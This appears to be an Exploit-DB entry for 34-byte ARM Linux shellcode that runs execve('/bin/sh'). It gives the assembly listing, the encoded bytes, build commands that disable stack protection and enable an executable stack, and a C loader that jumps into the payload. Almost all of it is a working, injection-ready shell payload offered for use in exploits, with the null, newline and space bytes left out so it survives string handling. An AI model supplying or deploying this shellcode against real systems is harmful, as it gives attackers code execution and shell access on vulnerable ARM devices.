Linux/ARM - execve("/bin/sh", NULL, 0) Shellcode (34 bytes)

EDB-ID:

43520

CVE:

N/A


Author:

dummys


Platform:

ARM

Date:

2017-03-31


/*
Title:  Linux/ARM - execve("/bin/sh", NULL, 0) - 34 bytes
Date:   2017-03-31
Tested: armv7l
Author: Jonathan 'dummys' Borgeaud - twitter: @dummys1337
fapperz.org

ARM shellcode whose encoding contains no 0x20, 0x0a or 0x00 bytes

assemble the shellcode: as -o sc.o sc.s

.syntax unified
.global main
.code 32
main:
    add  r3, pc, #1      /* r3 = pc + 1: bit 0 set so that bx switches to Thumb state */
    bx   r3              /* switch to thumb mode */
.thumb
    mov  r0, pc          /* move pc to r0 */
    adds r0, #14         /* make r0 to point to /bin//sh */
    str  r0, [sp, #4]    /* save the pointer to /bin//sh on the stack */
    subs r1, r1, r1      /* put 0 in r1 */
    subs r2, r2, r2      /* put 0 in r2 */
    movs r7, #8          /* move 8 in r7 */
    str r2, [r0, r7]     /* store r2 (zero) at r0+8, NUL-terminating /bin//sh */
    adds r7, #3          /* add 3 to r7 for execve syscall */
    svc  1               /* call execve */
    str  r7, [r5, #32]   /* string data "/b", spelled as a Thumb instruction */
    ldr  r1, [r5, #100]  /* string data "in", spelled as a Thumb instruction */
    cmp  r7, #0x2f       /* string data "//", spelled as a Thumb instruction */
    ldr  r3, [r6, #4]    /* string data "sh", spelled as a Thumb instruction */


compile the C loader: gcc -marm -fno-stack-protector -z execstack -o loader loader.c

*/

#include <stdio.h>
#include <string.h>

/*
 * The 34 bytes emitted by the listing above: two ARM words (add/bx into
 * Thumb state), the Thumb instructions, then the 8-byte "/bin//sh" string
 * as the final 8 bytes. Per the header, the encoding contains no 0x00, 0x0a
 * or 0x20 bytes, which is what lets it live in a C string literal and be
 * measured with strlen().
 */
char *SC =      "\x01\x30\x8f\xe2"
                "\x13\xff\x2f\xe1"
                "\x78\x46\x0e\x30"
                "\x01\x90\x49\x1a"
                "\x92\x1a\x08\x27"
                "\xc2\x51\x03\x37"
                "\x01\xdf\x2f\x62"
                "\x69\x6e\x2f\x2f"
                "\x73\x68";

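/*
 * Loader for the shellcode above: copies it into a stack buffer and jumps
 * to it. Build with the gcc line from the header (-marm so the indirect
 * call enters the buffer in ARM state, matching the add/bx prologue;
 * -z execstack so the stack buffer is executable). If execve() succeeds
 * this process is replaced by /bin/sh and main never returns; otherwise
 * it returns 0. Returns 1 without running anything if SC's length does
 * not match the declared 34 bytes.
 */
int main(void)
{
    enum {
        SC_LEN   = 34,  /* bytes in SC, per the title */
        SC_SLACK = 4    /* room for the shellcode's own terminator store */
    };
    /*
     * The shellcode stores a 32-bit zero at string+8 to NUL-terminate
     * "/bin//sh". The string is the last 8 bytes of the payload, so that
     * store lands at bytes 34..37 -- one word past an exactly 34-byte
     * buffer. Reserve that word so the write stays inside payload[].
     */
    char payload[SC_LEN + SC_SLACK];
    size_t len = strlen(SC);  /* SC contains no 0x00, so this is its full length */

    /* Refuse to run a blob whose length disagrees with the declared size. */
    if (len != SC_LEN) {
        fprintf(stderr, "Unexpected length: %zu (expected %d)\n", len, SC_LEN);
        return 1;
    }

    memcpy(payload, SC, SC_LEN);
    memset(payload + SC_LEN, 0, SC_SLACK);

    /* %zu: strlen() returns size_t; %d with a size_t is undefined behaviour. */
    fprintf(stdout, "Length: %zu\n", len);
    (*(void(*)()) payload) ();  /* does not return if execve() succeeds */

    return 0;
}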